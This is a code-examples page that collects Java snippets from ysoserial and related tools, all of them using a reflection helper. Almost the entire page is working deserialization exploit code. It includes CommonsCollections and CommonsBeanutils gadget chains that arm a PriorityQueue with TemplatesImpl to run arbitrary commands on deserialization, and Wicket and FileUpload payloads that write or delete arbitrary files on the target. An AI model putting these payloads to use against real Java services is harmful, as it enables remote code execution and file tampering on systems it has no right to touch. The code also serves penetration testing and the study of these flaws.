Java Code Examples for ysoserial.payloads.util.Reflections#getFieldValue()

The following examples show how to use ysoserial.payloads.util.Reflections#getFieldValue() . You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source File: CommonsCollections2.java    From ysoserial-modified with MIT License 6 votes vote down vote up 
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
    
    
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later
	queue.add(1);
	queue.add(1);

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
}
Example 2
Source File: CommonsBeanutils1.java    From ysoserial-modified with MIT License 6 votes vote down vote up 
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
  
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
}
Example 3
Source File: CommonsCollections2.java    From JavaSerialKiller with MIT License 6 votes vote down vote up 
public Queue<Object> getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later
	queue.add(1);
	queue.add(1);

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
}
Example 4
Source File: CommonsBeanutilsCollectionsLogging1.java    From JavaSerialKiller with MIT License 6 votes vote down vote up 
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
}
Example 5
Source File: CommonsCollections2.java    From ysoserial with MIT License 6 votes vote down vote up 
public Queue<Object> getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later
	queue.add(1);
	queue.add(1);

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
}
Example 6
Source File: CommonsBeanutils1.java    From ysoserial with MIT License 6 votes vote down vote up 
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
}
Example 7
Source File: Wicket1.java    From ysoserial-modified with MIT License 5 votes vote down vote up 
private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws IOException, Exception {
    // if thresh < written length, delete outputFile after copying to repository temp file
    // otherwise write the contents to repository temp file
    File repository = new File(repoPath);
    DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository, null);
    File outputFile = new File(filePath);
    DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
    OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
    os.write(data);
    Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
    Reflections.setFieldValue(diskFileItem, "dfos", dfos);
    Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
    return diskFileItem;
}
Example 8
Source File: CommonsCollections4.java    From ysoserial-modified with MIT License 5 votes vote down vote up 
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
    
	Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
Example 9
Source File: FileUpload1.java    From ysoserial-modified with MIT License 5 votes vote down vote up 
private static DiskFileItem makePayload ( int thresh, String repoPath, String filePath, byte[] data ) throws IOException, Exception {
    // if thresh < written length, delete outputFile after copying to repository temp file
    // otherwise write the contents to repository temp file
    File repository = new File(repoPath);
    DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository);
    File outputFile = new File(filePath);
    DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
    OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
    os.write(data);
    Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
    Reflections.setFieldValue(diskFileItem, "dfos", dfos);
    Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
    return diskFileItem;
}
Example 10
Source File: CommonsCollections4.java    From JavaSerialKiller with MIT License 5 votes vote down vote up 
public Queue<Object> getObject(final String command) throws Exception {
	TemplatesImpl templates = Gadgets.createTemplatesImpl(command);

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
Example 11
Source File: Wicket1.java    From ysoserial with MIT License 5 votes vote down vote up 
private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws IOException, Exception {
    // if thresh < written length, delete outputFile after copying to repository temp file
    // otherwise write the contents to repository temp file
    File repository = new File(repoPath);
    DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository, null);
    File outputFile = new File(filePath);
    DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
    OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
    os.write(data);
    Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
    Reflections.setFieldValue(diskFileItem, "dfos", dfos);
    Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
    return diskFileItem;
}
Example 12
Source File: CommonsCollections4.java    From ysoserial with MIT License 5 votes vote down vote up 
public Queue<Object> getObject(final String command) throws Exception {
	Object templates = Gadgets.createTemplatesImpl(command);

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
Example 13
Source File: FileUpload1.java    From ysoserial with MIT License 5 votes vote down vote up 
private static DiskFileItem makePayload ( int thresh, String repoPath, String filePath, byte[] data ) throws IOException, Exception {
    // if thresh < written length, delete outputFile after copying to repository temp file
    // otherwise write the contents to repository temp file
    File repository = new File(repoPath);
    DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository);
    File outputFile = new File(filePath);
    DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
    OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
    os.write(data);
    Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
    Reflections.setFieldValue(diskFileItem, "dfos", dfos);
    Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
    return diskFileItem;
}